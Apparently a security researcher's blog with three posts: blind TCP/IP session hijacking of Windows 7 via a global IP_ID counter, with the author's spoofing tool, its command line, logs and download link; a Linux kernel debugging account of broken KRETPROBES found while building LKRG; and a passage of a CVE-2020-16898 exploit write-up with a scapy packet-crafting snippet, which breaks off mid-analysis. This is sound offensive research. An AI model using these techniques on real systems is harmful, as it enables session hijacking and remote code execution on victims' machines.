That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OS (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP on a local conference in Poland (SysDay 2009).

Before we move to the details on how to perform described attack, it is useful to refresh how TCP handles the communication in more details. Quoting phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.
The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

Client IP
Server IP (usually known)
Client port
Server port (usually known)
Sequence number of the client
Sequence number of the server

OK, but what it has to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists .org/bugtraq/1998/Dec/79

and more information about Idle scan you can read here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

 Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When attacker guessed the valid client’s port, server replies to the real client (not attacker) with ACK. If port was incorrect, server replies to the real client with SYN+ACK. A real client didn’t start a new connection so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one
is:
– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best what I can do is to quote (again) phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:
A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).
A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).
It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.
Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.
If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.
Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.
The sequence number space is way bigger than the client-port space, but two facts make this scan easier:
First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.
Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.
With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. Described scenario perfectly works for Windows XP but I’ve encountered a different behavior in Windows 7. Having two edge cases as ACK value to fulfill ACK formula doesn’t really change anything and I have exactly the same results (just in Windows 7) just by always using one of the edge values for ACK. Originally, I thought that my implementation of attack is not working against Windows 7. However, after some tests and tuning it turns out that’s not the case. I’m not sure why or what I’m missing but, in the end, you can send less packages (twice less) and speed-up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.
However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.
If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.
Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).
Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage of how it handles correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0) Windows 7 won’t send any package back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost here. We can always brute force ACK if we have the correct SQN. Again, we don’t need to verify every possible value of ACK, we can still use the same trick with TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use window size value as 0x3FF. Essentially, we are flooding the server with the spoofed packets containing our payload for injection, with the correct SQN and guessed ACK. This operation takes around 5 minutes and is effective Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
We need to be able to send spoofed IP packets to execute this attack.
- Our attack relies on “scanning” and constant “poking” of IP_ID:
- Any latency between victim and the server affects such logic.
- If victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and I tested it against Windows XP. When I ran compiled binary on the modern system, everything was working fine. However, when I took the original sources and wanted to recompile it on the modern Linux environment, my tool stopped working(!). New binary was not able to find client’s port neither SQN. However, old binary still worked perfectly fine. It was a riddle for me what was really happening. Output of strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen has different values. However, I didn’t modify the source code so how is it possible? Some GCC/Glibc changes broke the functionality of sending the spoofed package. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite spoofing function to make it functional again on the modern Linux environment. However, to do that I needed to use different API. I wonder how many non-offensive tools were broken by this change

Windows 7

I’ve tested this tool against fully updated Windows 7. Surprisingly, rewriting PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break update channel/service(!) itself and you need to manually fix it. Usually, it means manual downloading of the specific KB and installing it in “safe mode”. Then it can “unlock” update service and you can continue your work. In the end it took me around 2-3 days to get fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate “tuning” per victim which could significantly speed-up the attack. However, in my specific case, the full attack which means finding client’s port address, finding server’s SQN and finding client’s SQN took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”
                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…
        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK!

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK!
        [!!] Port is found (49456)! Let’s go further…
        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [!!] SQN => 1874825280, with seq_offset => 65535
        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
       [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [!!] Real server’s SQN => 1874821505
        [+] Finish! check whether command was injected (should be :))
        [!] Next SQN [1874822706]
real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

Sometimes you can see that tool is spinning around the same value when trying to find “server’s real SQN”. If next to the number in the parentheses you see number 1, kill the attack, copy calculated SQN (the one around which value tool was spinning) and paste it as an SQN start parameter (-M). It should fix that edge case.
Sometimes you can encounter the problem that scanning by 64KB window size can ‘overjump’ the appropriate SQN brackets. You might want to reduce the window size to be smaller. However, tools should change the window size automatically if it finishes scanning the full SQN range with current window size and didn’t find the correct value. Nevertheless, it takes time. You might want to start scanning with the smaller window size (but that implies longer attack).
By default, tool sends ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality that it can read that field from any IP packet. It sends standard SYN packet and waits for reply to extract IP_ID. Please give an appropriate TCP port to appropriate parameter (-P)

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in specific session, you can see it is just incremented per each sent packet. However, each session has independent IP_ID base.

Happy hacking,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

pi3 — Tue, 15 Dec 2020 19:34:55 +0000

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
OPTIMIZER was not doing sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*ROBES and FTRACE. K*PROBES is older and a classic one – introduced in 2.6.9 (October 2004). However, FTRACE is a newer interface and might have smaller overhead comparing to K*PROBES. I’m using a word “K*PROBES” because various types of K*PROBES were availble in the kernel, including JPROBES, KRETPROBES or classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between various K*PROBES?

KPROBES – can be placed on virtually any instruction in the kernel
JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, since 2017 JPROBEs were depreciated. More information can be found here:
https://lwn.net/Articles/735667/
KRETPROBES – sometimes they are called “return probes” and they also use KPROBES under-the-hood. KRETPROBES allows to easily execute user’s own routine at the entry and return path to the hooked function.However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE are newer comparing to K*PROBES and were initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently and the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is being registered on the specific function, such “long-NOP” is being replaced with JUMP instruction which points to the trampoline code. Later such trampoline can execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step forward and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such KPROBE can’t be optimized, then classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE

LKRG reports False Positives

After such a long introduction finally, we can move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs FTRACE stress tester, LKRG reports corruption of .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I’ve not seen any significant changes between 5.8.x and 5.9.x in FTRACE logic. I spent some time on that and finally I realized that my protection of global FTRACE knob stopped working on latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe() before invoking any registered KPROBE verifies if it is not in NMI via in_nmi() call.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x but with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reasons, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES which we know is broken.

Second problem – OPTIMIZER isn’t doing sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, neither in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated a padding at the end of the hooked function using INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():

/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel

Thanks,
Adam

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

pi3 — Fri, 16 Oct 2020 18:57:49 +0000

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary:

This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets!
The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug
During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size
This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway.
Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what we have learned from it? Quite a lot:

We need to send RDNSS packet
The problem is an even number in the Length field
Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple:

v6_dst = 
v6_src = 

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set the breakpoints there and see if our package arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
